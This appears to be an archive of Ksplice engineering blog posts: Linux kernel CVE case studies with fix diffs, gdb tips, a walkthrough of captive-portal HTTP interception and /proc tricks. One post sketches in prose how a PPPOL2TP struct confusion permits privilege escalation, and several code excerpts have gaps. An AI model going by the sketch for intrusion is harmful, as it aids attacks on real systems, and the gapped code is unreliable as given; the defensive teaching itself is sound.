Wednesday Jul 22, 2015

Fixing Security Vulnerabilities in Linux

Security vulnerabilities are some of the hardest bugs to discover yet they can have the largest impact. At Ksplice, we spend a lot of time looking at security vulnerabilities and seeing how they are fixed. We use automated tools such as the Trinity syscall fuzzer and the Kernel Address Sanitizer (KASan) to aid our process. In this blog post we'll go over some case studies of recent vulnerabilities and show you how you can avoid them in your code.

CVE-2013-7339 and CVE-2014-2678

These two are very similar NULL pointer dereferences when trying to bind an RDS socket without having an RDS device. This is an oversight that happens quite often in hardware-specific code in the kernel. It is easy for developers to assume that a piece of hardware always exists since all their dev machines have it, but that sometimes leads to other possible hardware configurations left untested. In this example the code makes a seemingly reasonable assumption that using RDS sockets without RDS hardware doesn't really make sense.

The issue is pretty simple as we can see from this fix:

diff --git a/net/rds/ib.c b/net/rds/ib.c
index b4c8b00..ba2dffe 100644
--- a/net/rds/ib.c
+++ b/net/rds/ib.c
@@ -338,7 +338,8 @@ static int rds_ib_laddr_check(__be32 addr)
   ret = rdma_bind_addr(cm_id, (struct sockaddr *)&sin);
   /* due to this, we will claim to support iWARP devices unless we
      check node_type. */
-     if (ret || cm_id->device->node_type != RDMA_NODE_IB_CA)
+     if (ret || !cm_id->device ||
+         cm_id->device->node_type != RDMA_NODE_IB_CA)
                                   ret = -EADDRNOTAVAIL;

                                   rdsdebug("addr %pI4 ret %d node type %d\n",

Generally we are allowed to bind an address without a physical device so we can reach this code without any RDS hardware. Sadly, this code wrongly assumes that a devices exists at this point and that cm_id->device is not NULL leading to a NULL pointer dereference.

These type of issues are usually caught early in -next as that exposes the code to various users and hardware configurations, but this one managed to slip through somehow.

There are many variations of the scenario where the hardware specific and other kernel code doesn't handle cases which "don't make sense". Another recent example is dlmfs. The kernel would panic when trying to create a directory on it - something that doesn't happen in regular usage of dlmfs.


This one is interesting and very difficult to stumble upon by accident. It's a race condition that is only possible during the migration of huge pages between NUMA nodes, so the window of opportunity is *very* small. It can be triggered by trying to dump the NUMA maps of a process while its memory is being moved around. What happens is that the code trying to dump memory makes invalid memory accesses because it does not check the presence of the memory beforehand.

When we dump NUMA maps we need to walk memory entries using walk_page_range():

         * Handle hugetlb vma individually because pagetable
         * walk for the hugetlb page is dependent on the
         * architecture and we can't handled it in the same
         * manner as non-huge pages.
        if (walk->hugetlb_entry && (vma->vm_start <= addr) &&
            is_vm_hugetlb_page(vma)) {
                if (vma->vm_end < next)
                        next = vma->vm_end;
                 * Hugepage is very tightly coupled with vma,
                 * so walk through hugetlb entries within a
                 * given vma.
                err = walk_hugetlb_range(vma, addr, next, walk);
                if (err)
                pgd = pgd_offset(walk->mm, next);

When walk_page_range() detects a hugepage it calls walk_hugetlb_range(), which calls the proc's callback (provided by walk->hugetlb_entry()) for each page individually:

        pte_t *pte;
        int err = 0;

        do {
                next = hugetlb_entry_end(h, addr, end);
                pte = huge_pte_offset(walk->mm, addr & hmask);
                if (pte && walk->hugetlb_entry)
                        err = walk->hugetlb_entry(pte, hmask, addr, next, walk);
                if (err)
                        return err;
        } while (addr = next, addr != end);

Note that the callback is executed for each pte; even for those that are not present in memory (pte_present(*pte) would return false in that case). This is done by the walker code because it was assumed that callback functions might want to handle that scenario for some reason. In the past there was no way for a huge pte to be absent, but that changed when the hugepage migration was introduced. During page migration unmap_and_move_huge_page() removes huge ptes:

if (page_mapped(hpage)) {


page_was_mapped = 1;


Unfortunately, some callbacks were not changed to deal with this new possibility. A notable example is gather_pte_stats(), which tries to lock a non-existent pte:

        orig_pte = pte = pte_offset_map_lock(vma->vm_mm, pmd, addr, &ptl);

This can cause a panic if it happens during a tiny window inside unmap_and_move_huge_page().

Dumping NUMA maps doesn't happen too often and is mainly used for testing/debugging, so this bug has lived there for quite a while and was made visible only recently when hugepage migration was added.

It's also common that adding userspace interfaces to trigger kernel code which doesn't get called often exposes many issues. This happened recently when the firmware loading code was exposed to userspace.


This one also falls into the category of "doesn't make sense" because it involves repeated page faulting of memory that we marked as unwanted. When this happens shmem tries to remove a block of memory, but since it's getting faulted over and over again shmem will hang waiting until it's available for removal. Meanwhile other filesystem operations will be blocked, which is bad because that memory may never become available for removal.

When we're faulting a shmem page in, shmem_fault() would grab a reference to the page:

static int shmem_fault(struct vm_area_struct *vma, struct vm_fault *vmf) { [...] error = shmem_getpage(inode, vmf->pgoff, &vmf->page, SGP_CACHE, &ret);

But because shmem_fallocate() holds i_mutex this means that shmem_fallocate() can wait forever until it can free up that page. This, in turn means that that filesystem is stuck waiting for shmem_fallocate() to complete.

Beyond that, punching holes in files and marking memory as unwanted are not common operations; especially not on a shmem filesystem. This means that those code paths are very untested.


This is a privilege escalation which was found using KASan. We've noticed that as a result of a call to a PPPOL2TP ioctl an uninitialized address inside a struct was being read. Further investigation showed that this is the result of a confusion about the type of the struct that was being accessed.

When we call setsockopt from userspace on a PPPOL2TP socket in userspace we'll end up in pppol2tp_setsockopt() which will look at the level parameter to see if the sockopt operation is intended for PPPOL2TP or the underlying UDP socket:

   if (level != SOL_PPPOL2TP)
      return udp_prot.setsockopt(sk, level, optname, optval, optlen);

PPPOL2TP tries to be helpful here and allows userspace to set UDP sockopts rather than just PPPOL2TP ones. The problem here is that UDP's setsockopt expects a udp_sock:

 int udp_lib_setsockopt(struct sock *sk, int level, int optname,
                        char __user *optval, unsigned int optlen,
                        int (*push_pending_frames)(struct sock *))
         struct udp_sock *up = udp_sk(sk);

But instead it's getting just a sock struct.

It's possible to leverage this struct confusion to achieve privilege escalation. We can overwrite the function pointer in the struct to point to code of our choice. Then we can trigger the execution of this code by making another socket operation. The piece of code that allowed for this vulnerability was added for convenience, but no one ever needed it, and it was never tested.


We hope that this exposition of straightforward and more subtle kernel bugs will remind of the importance of looking at code from a new perspective and encourage the developer community to contribute to and create new tools and methodologies for detecting and preventing bugs in the kernel.

Monday Jan 24, 2011

8 gdb tricks you should know

Despite its age, gdb remains an amazingly versatile and flexible tool, and mastering it can save you huge amounts of time when trying to debug problems in your code. In this post, I'll share 10 tips and tricks for using GDB to debug most efficiently.

I'll be using the Linux kernel for examples throughout this post, not because these examples are necessarily realistic, but because it's a large C codebase that I know and that anyone can download and take a look at. Don't worry if you aren't familiar with Linux's source in particular -- the details of the examples won't matter too much.

  1. break WHERE if COND

    If you've ever used gdb, you almost certainly know about the "breakpoint" command, which lets you break at some specified point in the debugged program.

    But did you know that you can set conditional breakpoints? If you add if CONDITION to a breakpoint command, you can include an expression to be evaluated whenever the program reaches that point, and the program will only be stopped if the condition is fulfilled. Suppose I was debugging the Linux kernel and wanted to stop whenever init got scheduled. I could do:

    (gdb) break context_switch if next == init_task

    Note that the condition is evaluated by gdb, not by the debugged program, so you still pay the cost of the target stopping and switching to gdb every time the breakpoint is hit. As such, they still slow the target down in relation to to how often the target location is hit, not how often the condition is met.

  2. command

    In addition to conditional breakpoints, the command command lets you specify commands to be run every time you hit a breakpoint. This can be used for a number of things, but one of the most basic is to augment points in a program to include debug output, without having to recompile and restart the program. I could get a minimal log of every mmap() operation performed on a system using:

    (gdb) b do_mmap_pgoff 
    Breakpoint 1 at 0xffffffff8111a441: file mm/mmap.c, line 940.
    (gdb) command 1
    Type commands for when breakpoint 1 is hit, one per line.
    End with a line saying just "end".
    >print addr
    >print len
    >print prot
  3. gdb --args

    This one is simple, but a huge timesaver if you didn't know it. If you just want to start a program under gdb, passing some arguments on the command line, you can just build your command-line like usual, and then put "gdb --args" in front to launch gdb with the target program and the argument list both set:

    [~]$ gdb --args pizzamaker --deep-dish --toppings=pepperoni
    (gdb) show args
    Argument list to give program being debugged when it is started is
      " --deep-dish --toppings=pepperoni".
    (gdb) b main
    Breakpoint 1 at 0x45467c: file oven.c, line 123.
    (gdb) run

    I find this especially useful if I want to debug a project that has some arcane wrapper script that assembles lots of environment variables and possibly arguments before launching the actual binary (I'm looking at you, libtool). Instead of trying to replicate all that state and then launch gdb, simply make a copy of the wrapper, find the final "exec" call or similar, and add "gdb --args" in front.

  4. Finding source files

    I run Ubuntu, so I can download debug symbols for most of the packages on my system from, and I can get source using apt-get source. But how do I tell gdb to put the two together? If the debug symbols include relative paths, I can use gdb's directory command to add the source directory to my source path:

    [~/src]$ apt-get source coreutils
    [~/src]$ sudo apt-get install coreutils-dbgsym
    [~/src]$ gdb /bin/ls
    GNU gdb (GDB) 7.1-ubuntu
    (gdb) list main
    1192    ls.c: No such file or directory.
        in ls.c
    (gdb) directory ~/src/coreutils-7.4/src/
    Source directories searched: /home/nelhage/src/coreutils-7.4:$cdir:$cwd
    (gdb) list main
    1192        }
    1193    }
    1195    int
    1196    main (int argc, char **argv)
    1197    {
    1198      int i;
    1199      struct pending *thispend;
    1200      int n_files;

    Sometimes, however, debug symbols end up with absolute paths, such as the kernel's. In that case, I can use set substitute-path to tell gdb how to translate paths:

    [~/src]$ apt-get source linux-image-2.6.32-25-generic
    [~/src]$ sudo apt-get install linux-image-2.6.32-25-generic-dbgsym
    [~/src]$ gdb /usr/lib/debug/boot/vmlinux-2.6.32-25-generic 
    (gdb) list schedule
    5519    /build/buildd/linux-2.6.32/kernel/sched.c: No such file or directory.
        in /build/buildd/linux-2.6.32/kernel/sched.c
    (gdb) set substitute-path /build/buildd/linux-2.6.32 /home/nelhage/src/linux-2.6.32/
    (gdb) list schedule
    5520    static void put_prev_task(struct rq *rq, struct task_struct *p)
    5521    {
    5522        u64 runtime = p->se.sum_exec_runtime - p->se.prev_sum_exec_runtime;
    5524        update_avg(&p->se.avg_running, runtime);
    5526        if (p->state == TASK_RUNNING) {
    5527            /*
    5528             * In order to avoid avg_overlap growing stale when we are
  5. Debugging macros

    One of the standard reasons almost everyone will tell you to prefer inline functions over macros is that debuggers tend to be better at dealing with inline functions. And in fact, by default, gdb doesn't know anything at all about macros, even when your project was built with debug symbols:

    (gdb) p GFP_ATOMIC
    No symbol "GFP_ATOMIC" in current context.
    (gdb) p task_is_stopped(&init_task)
    No symbol "task_is_stopped" in current context.

    However, if you're willing to tell GCC to generate debug symbols specifically optimized for gdb, using -ggdb3, it can preserve this information:

    $ make KCFLAGS=-ggdb3
    (gdb) break schedule
    (gdb) continue
    (gdb) p/x GFP_ATOMIC
    $1 = 0x20
    (gdb) p task_is_stopped_or_traced(init_task)
    $2 = 0

    You can also use the macro and info macro commands to work with macros from inside your gdb session:

    (gdb) macro expand task_is_stopped_or_traced(init_task)
    expands to: ((init_task->state & (4 | 8)) != 0)
    (gdb) info macro task_is_stopped_or_traced
    Defined at include/linux/sched.h:218
      included at include/linux/nmi.h:7
      included at kernel/sched.c:31
    #define task_is_stopped_or_traced(task) ((task->state & (__TASK_STOPPED | __TASK_TRACED)) != 0)

    Note that gdb actually knows which contexts macros are and aren't visible, so when you have the program stopped inside some function, you can only access macros visible at that point. (You can see that the "included at" lines above show you through exactly what path the macro is visible).

  6. gdb variables

    Whenever you print a variable in gdb, it prints this weird $NN = before it in the output:

    (gdb) p 5+5
    $1 = 10

    This is actually a gdb variable, that you can use to reference that same variable any time later in your session:

    (gdb) p $1
    $2 = 10

    You can also assign your own variables for convenience, using set:

    (gdb) set $foo = 4
    (gdb) p $foo
    $3 = 4

    This can be useful to grab a reference to some complex expression or similar that you'll be referencing many times, or, for example, for simplicity in writing a conditional breakpoint (see tip 1).

  7. Register variables

    In addition to the numeric variables, and any variables you define, gdb exposes your machine's registers as pseudo-variables, including some cross-architecture aliases for common ones, like $sp for the the stack pointer, or $pc for the program counter or instruction pointer.

    These are most useful when debugging assembly code or code without debugging symbols. Combined with a knowledge of your machine's calling convention, for example, you can use these to inspect function parameters:

    (gdb) break write if $rsi == 2

    will break on all writes to stderr on amd64, where the $rsi register is used to pass the first parameter.

  8. The x command

    Most people who've used gdb know about the print or p command, because of its obvious name, but I've been surprised how many don't know about the power of the x command.

    x (for "examine") is used to output regions of memory in various formats. It takes two arguments in a slightly unusual syntax:


    ADDRESS, unsurprisingly, is the address to examine; It can be an arbitrary expression, like the argument to print.

    FMT controls how the memory should be dumped, and consists of (up to) three components:

    • A numeric COUNT of how many elements to dump
    • A single-character FORMAT, indicating how to interpret and display each element
    • A single-character SIZE, indicating the size of each element to display.

    x displays COUNT elements of length SIZE each, starting from ADDRESS, formatting them according to the FORMAT.

    There are many valid "format" arguments; help x in gdb will give you the full list, so here's my favorites:

    x/x displays elements in hex, x/d displays them as signed decimals, x/c displays characters, x/i disassembles memory as instructions, and x/s interprets memory as C strings.

    The SIZE argument can be one of: b, h, w, and g, for one-, two-, four-, and eight-byte blocks, respectively.

    If you have debug symbols so that GDB knows the types of everything you might want to inspect, p is usually a better choice, but if not, x is invaluable for taking a look at memory.

    [~]$ grep saved_command /proc/kallsyms
    ffffffff81946000 B saved_command_line
    (gdb) x/s 0xffffffff81946000
    ffffffff81946000 <>:     "root=/dev/sda1 quiet"

    x/i is invaluable as a quick way to disassemble memory:

    (gdb) x/5i schedule
       0xffffffff8154804a <schedule>:   push   %rbp
       0xffffffff8154804b <schedule+1>: mov    $0x11ac0,%rdx
       0xffffffff81548052 <schedule+8>: mov    %gs:0xb588,%rax
       0xffffffff8154805b <schedule+17>:    mov    %rsp,%rbp
       0xffffffff8154805e <schedule+20>:    push   %r15

    If I'm stopped at a segfault in unknown code, one of the first things I try is something like x/20i $ip-40, to get a look at what the code I'm stopped at looks like.

    A quick-and-dirty but surprisingly effective way to debug memory leaks is to let the leak grow until it consumes most of a program's memory, and then attach gdb and just x random pieces of memory. Since the leaked data is using up most of memory, you'll usually hit it pretty quickly, and can try to interpret what it must have come from.


Ksplice is hiring!

Do you love tinkering with, exploring, and debugging Linux systems? Does writing Python clones of your favorite childhood computer games sound like a fun weekend project? Have you ever told a joke whose punch line was a git command?

Join Ksplice and work on technology that most people will tell you is impossible: updating the Linux kernel while it is running.

Help us develop the software and infrastructure to bring rebootless kernel updates to Linux, as well as new operating system kernels and other parts of the software stack. We're hiring backend, frontend, and kernel engineers. Say hello at!

Monday Jan 17, 2011

Coffee shop Internet access

How does coffee shop Internet access work?

wireless coffee

You pull out your laptop and type into the URL bar on your browser. Instead of your friendly search box, you get a page where you pay money or maybe watch an advertisement, agree to some terms of service, and are only then free to browse the web.

What is going on behind the scenes to give the coffee shop that kind of control over your packets? Let's trace an example of that process from first broadcast to last redirect and find out.

Step 1: Get our network configuration

When I first sit down and turn on my laptop, it needs to get some network information and join a wireless network.

My laptop is configured to use DHCP to request network configuration information and an IP address from a DHCP server in its Layer 2 broadcast domain.

This laptop happens to use the DCHP client dhclient. /etc/dhcp3/dhclient.conf is a sample dhclient configuration file describing among other things what the client will request from a DHCP server (your network manager might frob that configuration -- on my Ubuntu laptop, NetworkManager keeps a modified config at /var/run/nm-dhclient-wlan0.conf).

A DHCP negotiation happens in 4 parts:


Step 1: DHCP discovery. The DHCP client (us, in the screencap) sends a message to Ethernet broadcast address ff:ff:ff:ff:ff:ff to discover DHCP servers (Wireshark shows IP addresses in the summary view, so we see broadcast IP address The packet includes a parameter request list with the parameters in the dhclient config file. The parameters in my /var/run/nm-dhclient-wlan0.conf are:

subnet-mask, broadcast-address, time-offset, routers,
domain-name, domain-name-servers, domain-search, host-name,
netbios-name-servers, netbios-scope, interface-mtu,
rfc3442-classless-static-routes, ntp-servers;
Step 2: DHCP offer. DHCP servers that get the discovery broadcast allocate an IP address and respond with a DHCP broadcast containing that IP address and other lease information. This is typically a simple race -- whoever gets an offer packet to the requester first wins. In our case, only MAC address 00:90:fb:17:ca:4e (Wireshark shows IP address answers our discovery broadcast.

Step 3: DHCP request. The DHCP client picks an offer and sends another DHCP broadcast, informing the DHCP servers of the winner and letting the losers de-allocate their reserved IP addresses.

Step 4: DHCP acknowledgment. The winning DHCP server acknowledges completion of the DHCP exchange and reiterates the DHCP lease parameters. We now have an IP address ( and know the IP address of our gateway router (

DHCP lease

Step 2: Find our gateway

We managed to get a lot done using broadcast packets, but at this point a) nobody in our broadcast domain knows our MAC address, and b) we don't know the MAC address of our gateway, so we can't get any packets routed out to the Internet. Let's fix that:


Before offering us IP address, the DHCP server (Portwell_17:ca:4) sends an ARP request for that address, saying "Who has If that's you, respond with your MAC address". Since nobody answers, the server can be fairly confident that the IP address is not already in use.

After getting assigned IP address, we (Apple_8f:95:3f) double-check that nobody else is using it with a few ARP requests that nobody answers. We then send a few gratuitous ARPs to let everyone know that it's ours and they should update their ARP caches.

We then make an ARP request for the MAC address corresponding to the IP address for our gateway router: Our DHCP server happens to also be our gateway router and responds claiming the address.

Step 3: Get past the terms of service

Now that we have an IP address and know the IP address of our gateway, we should be able to send packets through our gateway and out to the Internet.

I type into my browser's URL bar. There is no period at the end, so the local DNS resolver can't tell if this is a fully-qualified domain name. This is what happens:

DNS resolution

Looking back at the DHCP acknowledgement, as part of the lease we were given a domain name: What our local DNS resolver decides to do with host, since it potentially isn't fully-qualified, is append the domain name from the DHCP lease to it (eg in the first iteration) and try to resolve that. When the resolution fails, it tries appending decreasingly specific parts of the DHCP domain name, finds that all of them fail, and then gives up and tries to resolve plain old This works, and we get back IP address A whois after the fact confirms that this is Google:

jesstess@pretzel-logic:~$ whois
NetRange: -
OriginAS:       AS15169
NetName:        GOOGLE
OrgName:        Google Inc.
OrgId:          GOGL
Address:        1600 Amphitheatre Parkway
City:           Mountain View
StateProv:      CA
We complete a TCP handshake with ``'' and make an HTTP GET request for the resource we want (/). Instead of getting back an HTTP 200 and the Google home page, we receive a 302 redirect to MacAddr=00%3a23%3a6C%3a8F%3a95%3a3F&IpAddr=192%2e168%2e5%2e87& vsgpId=a45946c6%2d737a%2d11dd%2d8436%2d0090fb2004bc&vsgId=93196& UserAgent=&ProxyHost=:

TCP handshake + HTTP

Our MAC address and IP address are conveniently encoded in the redirect URL.

So what is going on here? Why didn't we get back the Google home page?

Our DHCP server/router,, is capturing our HTTP traffic and redirecting it to a special landing page. We don't get to make it out to Google until we finish playing a game with the coffee shop.

Let's dwell on this for a moment, because it's kind of amazing that the way the Internet is designed, our gateway router can hijack our HTTP requests and we can't stop it. In this case, we can see that the URL has changed in our browser after the redirect, but if a malicious gateway were transparently proxying our HTTP requests to an evil malware-laden clone of, we'd have no way to notice because there wouldn't be a redirect and the URL wouldn't change.

Worrisome? Definitely, if you're trusting a gateway with sensitive information. If you don't want to have to trust your gateway, you have to use point-to-point encryption: HTTPS, SSH, your favorite IPSec or SSL VPN, etc. And then hope there aren't bugs in your secure protocol's implementation.

Well, ain't nothing to it but to do a DNS lookup on the host name in the redirect ( and make our request there:


nmd is a host in the domain from our DHCP lease, so our local resolver's rules manage to resolve it in one try, and we get IP address This is incidentally the IP address of the DHCP Server Identifier we received with our DHCP lease.

We try our HTTP GET request again there and get back an HTTP 200 and a landing page (still not the Google home page), which the browser renders.

The landing page has some ads and terms of service, and a button to click that we're told will grant us Internet access. That click generates an HTTP POST:

get to

Step 4: Get to Google

Having agreed to the terms of service, communicates to our gateway router that our MAC address (which was passed in the redirect URL) should be added to a whitelist, and our traffic shouldn't be captured and redirected anymore -- our HTTP packets should be allowed out onto the Internet. responds to our POST with a final HTTP 302 redirect, this time to We do a final DNS lookup, make our HTTP GET, and get served an HTTP 200 and a webpage with some ads enticing us to level up our coffee addiction. We now have real Internet access and can get to

And that's the story! This ability to hijack HTTP traffic at a gateway until terms are met has over the years facilitated a huge industry based around private WiFi networks at coffee shops, airports, and hotels.

It is also a reminder about just how much control your gateway, or a device pretending to be your gateway, has when you use insecure protocols. Upside-down-ternet is a playful example of exploiting the trust in your gateway, but bogus DNS resolution or transparently proxying requests to malicious sites makes use of this same principle.


Monday Jan 10, 2011

Solving problems with proc

The Linux kernel exposes a wealth of information through the proc special filesystem. It's not hard to find an encyclopedic reference about proc. In this article I'll take a different approach: we'll see how proc tricks can solve a number of real-world problems. All of these tricks should work on a recent Linux kernel, though some will fail on older systems like RHEL version 4.

Almost all Linux systems will have the proc filesystem mounted at /proc. If you look inside this directory you'll see a ton of stuff:

keegan@lyle$ mount | grep ^proc
proc on /proc type proc (rw,noexec,nosuid,nodev)
keegan@lyle$ ls /proc
1      13     23     29672  462        cmdline      kcore         self
10411  13112  23842  29813  5          cpuinfo      keys          slabinfo
12934  15260  26317  4      bus        irq          partitions    zoneinfo
12938  15262  26349  413    cgroups    kallsyms     sched_debug

These directories and files don't exist anywhere on disk. Rather, the kernel generates the contents of /proc as you read it. proc is a great example of the UNIX "everything is a file" philosophy. Since the Linux kernel exposes its internal state as a set of ordinary files, you can build tools using basic shell scripting, or any other programming environment you like. You can also change kernel behavior by writing to certain files in /proc, though we won't discuss this further.

Each process has a directory in /proc, named by its numerical process identifier (PID). So for example, information about init (PID 1) is stored in /proc/1. There's also a symlink /proc/self, which each process sees as pointing to its own directory:

keegan@lyle$ ls -l /proc/self
lrwxrwxrwx 1 root root 64 Jan 6 13:22 /proc/self -> 13833

Here we see that 13833 was the PID of the ls process. Since ls has exited, the directory /proc/13883 will have already vanished, unless your system reused the PID for another process. The contents of /proc are constantly changing, even in response to your queries!

Back from the dead

It's happened to all of us. You hit the up-arrow one too many times and accidentally wiped out that really important disk image.

keegan@lyle$ rm hda.img

Time to think fast! Luckily you were still computing its checksum in another terminal. And UNIX systems won't actually delete a file on disk while the file is in use. Let's make sure our file stays "in use" by suspending md5sum with control-Z:

keegan@lyle$ md5sum hda.img
[1]+  Stopped                 md5sum hda.img

The proc filesystem contains links to a process's open files, under the fd subdirectory. We'll get the PID of md5sum and try to recover our file:

keegan@lyle$ jobs -l
[1]+ 14595 Stopped                 md5sum hda.img
keegan@lyle$ ls -l /proc/14595/fd/
total 0
lrwx------ 1 keegan keegan 64 Jan 6 15:05 0 -> /dev/pts/18
lrwx------ 1 keegan keegan 64 Jan 6 15:05 1 -> /dev/pts/18
lrwx------ 1 keegan keegan 64 Jan 6 15:05 2 -> /dev/pts/18
lr-x------ 1 keegan keegan 64 Jan 6 15:05 3 -> /home/keegan/hda.img (deleted)
keegan@lyle$ cp /proc/14595/fd/3 saved.img
keegan@lyle$ du -h saved.img
320G    saved.img

Disaster averted, thanks to proc. There's one big caveat: making a full byte-for-byte copy of the file could require a lot of time and free disk space. In theory this isn't necessary; the file still exists on disk, and we just need to make a new name for it (a hardlink). But the ln command and associated system calls have no way to name a deleted file. On FreeBSD we could use fsdb, but I'm not aware of a similar tool for Linux. Suggestions are welcome!

Redirect harder

Most UNIX tools can read from standard input, either by default or with a specified filename of "-". But sometimes we have to use a program which requires an explicitly named file. proc provides an elegant workaround for this flaw.

A UNIX process refers to its open files using integers called file descriptors. When we say "standard input", we really mean "file descriptor 0". So we can use /proc/self/fd/0 as an explicit name for standard input:

keegan@lyle$ cat 
import sys
print file(sys.argv[1]).read()
keegan@lyle$ echo hello | python 
IndexError: list index out of range
keegan@lyle$ echo hello | python -
IOError: [Errno 2] No such file or directory: '-'
keegan@lyle$ echo hello | python /proc/self/fd/0

This also works for standard output and standard error, on file descriptors 1 and 2 respectively. This trick is useful enough that many distributions provide symlinks at /dev/stdin, etc.

There are a lot of possibilities for where /proc/self/fd/0 might point:

keegan@lyle$ ls -l /proc/self/fd/0
lrwx------ 1 keegan keegan 64 Jan  6 16:00 /proc/self/fd/0 -> /dev/pts/6
keegan@lyle$ ls -l /proc/self/fd/0 < /dev/null
lr-x------ 1 keegan keegan 64 Jan  6 16:00 /proc/self/fd/0 -> /dev/null
keegan@lyle$ echo | ls -l /proc/self/fd/0
lr-x------ 1 keegan keegan 64 Jan  6 16:00 /proc/self/fd/0 -> pipe:[9159930]

In the first case, stdin is the pseudo-terminal created by my screen session. In the second case it's redirected from a different file. In the third case, stdin is an anonymous pipe. The symlink target isn't a real filename, but proc provides the appropriate magic so that we can read the file anyway. The filesystem nodes for anonymous pipes live in the pipefs special filesystem — specialer than proc, because it can't even be mounted.

The phantom progress bar

Say we have some program which is slowly working its way through an input file. We'd like a progress bar, but we already launched the program, so it's too late for pv.

Alongside /proc/$PID/fd we have /proc/$PID/fdinfo, which will tell us (among other things) a process's current position within an open file. Let's use this to make a little script that will attach a progress bar to an existing process:

keegan@lyle$ cat phantom-progress.bash
name=$(readlink $fd)
size=$(wc -c $fd | awk '{print $1}')
while [ -e $fd ]; do
  progress=$(cat $fdinfo | grep ^pos | awk '{print $2}')
  echo $((100*$progress / $size))
  sleep 1
done | dialog --gauge "Progress reading $name" 7 100

We pass the PID and a file descriptor as arguments. Let's test it:

keegan@lyle$ cat 
import sys
import time
f = file(sys.argv[1], 'r')
keegan@lyle$ python bigfile &
[1] 18589
keegan@lyle$ ls -l /proc/18589/fd
total 0
lrwx------ 1 keegan keegan 64 Jan  6 16:40 0 -> /dev/pts/16
lrwx------ 1 keegan keegan 64 Jan  6 16:40 1 -> /dev/pts/16
lrwx------ 1 keegan keegan 64 Jan  6 16:40 2 -> /dev/pts/16
lr-x------ 1 keegan keegan 64 Jan  6 16:40 3 -> /home/keegan/bigfile
keegan@lyle$ ./phantom-progress.bash 18589 3

And you should see a nice curses progress bar, courtesy of dialog. Or replace dialog with gdialog and you'll get a GTK+ window.

Chasing plugins

A user comes to you with a problem: every so often, their instance of Enterprise FooServer will crash and burn. You read up on Enterprise FooServer and discover that it's a plugin-riddled behemoth, loading dozens of shared libraries at startup. Loading the wrong library could very well cause mysterious crashing.

The exact set of libraries loaded will depend on the user's config files, as well as environment variables like LD_PRELOAD and LD_LIBRARY_PATH. So you ask the user to start fooserver exactly as they normally do. You get the process's PID and dump its memory map:

keegan@lyle$ cat /proc/21637/maps
00400000-00401000 r-xp 00000000 fe:02 475918             /usr/bin/fooserver
00600000-00601000 rw-p 00000000 fe:02 475918             /usr/bin/fooserver
02519000-0253a000 rw-p 00000000 00:00 0                  [heap]
7ffa5d3c5000-7ffa5d3c6000 r-xp 00000000 fe:02 1286241    /usr/lib/foo-1.2/
7ffa5d3c6000-7ffa5d5c5000 ---p 00001000 fe:02 1286241    /usr/lib/foo-1.2/
7ffa5d5c5000-7ffa5d5c6000 rw-p 00000000 fe:02 1286241    /usr/lib/foo-1.2/
7ffa5d5c6000-7ffa5d5c7000 r-xp 00000000 fe:02 1286243    /usr/lib/foo-1.3/
7ffa5d5c7000-7ffa5d7c6000 ---p 00001000 fe:02 1286243    /usr/lib/foo-1.3/
7ffa5d7c6000-7ffa5d7c7000 rw-p 00000000 fe:02 1286243    /usr/lib/foo-1.3/
7ffa5d7c7000-7ffa5d91f000 r-xp 00000000 fe:02 4055115    /lib/
7ffa5d91f000-7ffa5db1e000 ---p 00158000 fe:02 4055115    /lib/
7ffa5db1e000-7ffa5db22000 r--p 00157000 fe:02 4055115    /lib/
7ffa5db22000-7ffa5db23000 rw-p 0015b000 fe:02 4055115    /lib/
7ffa5db23000-7ffa5db28000 rw-p 00000000 00:00 0 
7ffa5db28000-7ffa5db2a000 r-xp 00000000 fe:02 4055114    /lib/
7ffa5db2a000-7ffa5dd2a000 ---p 00002000 fe:02 4055114    /lib/
7ffa5dd2a000-7ffa5dd2b000 r--p 00002000 fe:02 4055114    /lib/
7ffa5dd2b000-7ffa5dd2c000 rw-p 00003000 fe:02 4055114    /lib/
7ffa5dd2c000-7ffa5dd4a000 r-xp 00000000 fe:02 4055128    /lib/
7ffa5df26000-7ffa5df29000 rw-p 00000000 00:00 0 
7ffa5df46000-7ffa5df49000 rw-p 00000000 00:00 0 
7ffa5df49000-7ffa5df4a000 r--p 0001d000 fe:02 4055128    /lib/
7ffa5df4a000-7ffa5df4b000 rw-p 0001e000 fe:02 4055128    /lib/
7ffa5df4b000-7ffa5df4c000 rw-p 00000000 00:00 0 
7fffedc07000-7fffedc1c000 rw-p 00000000 00:00 0          [stack]
7fffedcdd000-7fffedcde000 r-xp 00000000 00:00 0          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0  [vsyscall]

That's a serious red flag: fooserver is loading the bar plugin from FooServer version 1.2 and the quux plugin from FooServer version 1.3. If the versions aren't binary-compatible, that might explain the mysterious crashes. You can now hassle the user for their config files and try to fix the problem.

Just for fun, let's take a closer look at what the memory map means. Right away, we can recognize a memory address range (first column), a filename (last column), and file-like permission bits rwx. So each line indicates that the contents of a particular file are available to the process at a particular range of addresses with a particular set of permissions. For more details, see the proc manpage.

The executable itself is mapped twice: once for executing code, and once for reading and writing data. The same is true of the shared libraries. The flag p indicates a private mapping: changes to this memory area will not be shared with other processes, or saved to disk. We certainly don't want the global variables in a shared library to be shared by every process which loads that library. If you're wondering, as I was, why some library mappings have no access permissions, see this glibc source comment. There are also a number of "anonymous" mappings lacking filenames; these exist in memory only. An allocator like malloc can ask the kernel for such a mapping, then parcel out this storage as the application requests it.

The last two entries are special creatures which aim to reduce system call overhead. At boot time, the kernel will determine the fastest way to make a system call on your particular CPU model. It builds this instruction sequence into a little shared library in memory, and provides this virtual dynamic shared object (named vdso) for use by userspace code. Even so, the overhead of switching to the kernel context should be avoided when possible. Certain system calls such as gettimeofday are merely reading information maintained by the kernel. The kernel will store this information in the public virtual system call page (named vsyscall), so that these "system calls" can be implemented entirely in userspace.

Counting interruptions

We have a process which is taking a long time to run. How can we tell if it's CPU-bound or IO-bound?

When a process makes a system call, the kernel might let a different process run for a while before servicing the request. This voluntary context switch is especially likely if the system call requires waiting for some resource or event. If a process is only doing pure computation, it's not making any system calls. In that case, the kernel uses a hardware timer interrupt to eventually perform a nonvoluntary context switch.

The file /proc/$PID/status has fields labeled voluntary_ctxt_switches and nonvoluntary_ctxt_switches showing how many of each event have occurred. Let's try our slow reader process from before:

keegan@lyle$ python bigfile &
[1] 15264
keegan@lyle$ watch -d -n 1 'cat /proc/15264/status | grep ctxt_switches'

You should see mostly voluntary context switches. Our program calls into the kernel in order to read or sleep, and the kernel can decide to let another process run for a while. We could use strace to see the individual calls. Now let's try a tight computational loop:

keegan@lyle$ cat tightloop.c
int main() {
  while (1) {
